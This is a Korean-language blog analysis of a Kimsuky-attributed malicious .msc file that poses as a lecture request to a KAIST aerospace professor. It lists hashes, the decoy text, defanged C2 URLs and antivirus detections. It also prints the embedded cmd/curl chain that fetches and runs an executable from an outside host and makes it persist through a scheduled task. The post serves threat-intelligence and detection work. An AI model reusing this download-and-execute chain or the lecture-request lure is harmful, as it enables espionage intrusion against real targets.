김수키(Kimsuky)에서 만든 항공우주공학과 관련자 타겟팅 악성코드-강의의뢰서(2024.8.29)

오늘은 김수키(Kimsuky) 에서 만든 항공우주공학과 관련자 타겟팅 악성코드인 강의의뢰서(2024.8.29)에 대해 알아보겠습니다. 요즈음 Kimsuky(김수키)가 보니 카이스트 ?????과 ???? 교수님께 강연하는 것처럼 보내는 메일로 공격한 것을 추정되는 악성코드에 대해 분석을 해보겠습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:강의의뢰서.msc
사이즈:142 KB
MD5:ef8947d291107256cb5883ac3bc163d0
SHA-1:cf8555a2d9fc8081ba8c8e29f7905dd926655df1
SHA-256:8028b918d06cf3635e7e77d29cb0a4622d8cf4ee30881fb297435f7328ff45e4

악성코드 강의의뢰서 실행

일단 해당 악성코드는 msc 확장자로 돼 있으며 일단 귀찮으니 노트패드++ 로 한번 열어 보았습니다.
뭐~노트 패드로 열어보면 여러 가지 나오는데 핵심만 보겠습니다.

악성코드 강의 의뢰서 msc 노트패드 보기

<ConsoleTaskpads>
    <ConsoleTaskpad ListSize="Medium" IsNodeSpecific="true" Replace(s)DefaultView="
    tr(u)e" NoResults="true" Descriptio(n)sAsText="true" NodeType="{C96401CE-0E17-
    11D3-885B(-)00C04F72C717}" ID="{656F3A6A-1A63-4FC4(-)9C9B-4B75AF6DF3A3}">
      <String Name(=)"Name" ID="19"/>
      <String Name="D(e)scription" Value=""/>
      <String Name="Tool(t)ip" Value=""/>
      <Tasks>
        <Task Type="Command(L)ine" Command="cmd.exe">
          <String Name="Name" I(D)="18"/>
          <String Name="Descripti(o)n" ID="28"/>
          <Symbol>
            <Image Name="Small" Binar(y)RefIndex="6"/>
            <Image Name="Large" BinaryRe(f)Index="7"/>
          </Symbol>
          <CommandLine Directory="" WindowS(t)ate="Minimized" Params="/c mode 15,1&amp;curl
          -o &quot;%temp%(\)Grieco Kavanagh Passive Supporters.docx&quot; &quot;
          http(:)//rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d.php?na=view&quot;&amp;
          &quot;%temp%\Grieco Kavanagh Passive Supporters(.)docx&quot;&amp;po
          wershell -windowstyle hidden $a=1&amp;curl -o &quot;%appdata%\pest&qu
          ot; &quot;h(t)tp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na
          =myapp&quot;&amp;type &quot;%appdata%\pest&quot;&gt;&quot;%appdata%\p
          est(.)exe&quot;&amp;schtasks /create /tn TemporaryClearStatesesf /tr 
          &quot;%appdata%\pest(.)exe&quot; /sc minute /mo 58 /f&amp;curl -o &qu
          ot;%appdata%\pest.exe.manifest&quot; &quot;ht(t)p://rem(.)zoom-meetin
          g(.)kro(.)kr/0829_pprb/d.php?na=myappfest&quot;&amp;exit"/>
        </Task>
      </Tasks>

코드 분석

Params에 포함된 명령어 분석
mode 15,1: 명령 프롬프트 창의 크기를 조정하는 명령
curl -o "%temp%\Grieco Kavanagh Passive Supporters(.)docx" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view:curl을 사용해 지정된 URL에서 Word 문서를 다운로드하여 임시 디렉터리에 저장
powershell -windowstyle hidden $a=1:파워셸 명령어를 숨겨진 창 상태로 실행
curl -o "%appdata%\pest" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=myapp: 지정된 URL에서 파일을 다운로드하여 %appdata% 폴더에 저장
type "%appdata%\pest">"%appdata%\pest(.)exe:다운로드된 파일을 실행 파일로 변환
schtasks /create /tn TemporaryClearStatesesf /tr "%appdata%\pest(.)exe" /sc minute /mo 58 /f: 스케줄러 작업을 만들어 58분마다 해당 파일을 실행하도록 설정
curl -o "%appdata%\pest.exe.manifest" "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d.php?na=myappfest:또 다른 파일을 다운로드하여 %appdata%에 저장

Grieco Kavanagh Passive Supporters 내용

Grieco Kavanagh Passive Supporters 내용

안녕하십니까.
바쁘신 와중에도 금번 강연을 수락해주셔서 감사드립니다.
다음과 같이 강연을 의뢰하오니 참고하시기 바랍니다.
강연의뢰서
강연 개요
강연 주최:한국CFO협회
강연자:????교수님
소속:카이스트 ???????과
주제(제목):우주경제의 현황과 미래
일정:2024년 9월 19일 (목)
강연시간:8:00~9:00시 강연 (강연시간 1시간)
(7:30~8:00시 조찬식사 (30분))
장소:플라자 호텔 4층 Maple Hall (서울시청 앞)
대상:CFO회원 (기업대표 약 70~90여분)
강연료: 100만 원
요청 사항:요청 일시
제목:우주경제의 현황과 미래 8월 28일
사진: 상반신 사진 선호
요약문: 150자 내외 서술식
약력사항: 소개자료용 (학력, 경력 등)
강연자료: PPT 파일:8월 28일
강연개시: 강연 후 CFO사이트에 탑재 예정
강의 주안점:강의 주안점 서술

악성코드 CMD 코멘드 라인

msc->PEST.EXE pest.exe.manifest->sim(.)sid->sif(.)bat

악성 사이트 주소

hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view
hxxp://rem(.)zoom-meeting.kro(.)kr/0829_pprb/d(.)php?na=myapp

즉 해당 악성코드는 카이스트 방효충 교수님이 마치 강연하는 것처럼 해놓고 실제로는 항공우주공학 기술을 탈취하기 위한 작전인 것 같습니다.
2024-08-29 13:48:11 UTC 바이러스토탈에서 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
Arcabit:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
BitDefender:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
Emsisoft:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE (B)
eScan:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
GData:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
Ikarus:Win32.Outbreak
Kaspersky:HEUR:Trojan.Script.MSC.gen
MAX:Malware (ai Score=84)
Trellix (HX):Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
VIPRE:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
VirIT:Trojan.MSC.Heur.A
ZoneAlarm by Check Point:HEUR:Trojan.Script.MSC.gen
일단 대부분이 BitDefender 또는 카스퍼스키 엔진이나 자체 엔진 몇 개는 보이지만 BitDefender 엔진으로 탐지하는 보안 업체들이 대부분인 것 같습니다. 결론 私見으로는 99% 항공우주공학 관련 기업 또는 항공우주공학 관련 교수들을 해킹해서 항공우주 기술 탈취 목적인 것을 추측할 수가 있습니다.일단 나는 탐지 해야 겠다는 정신으로 시만텍 신고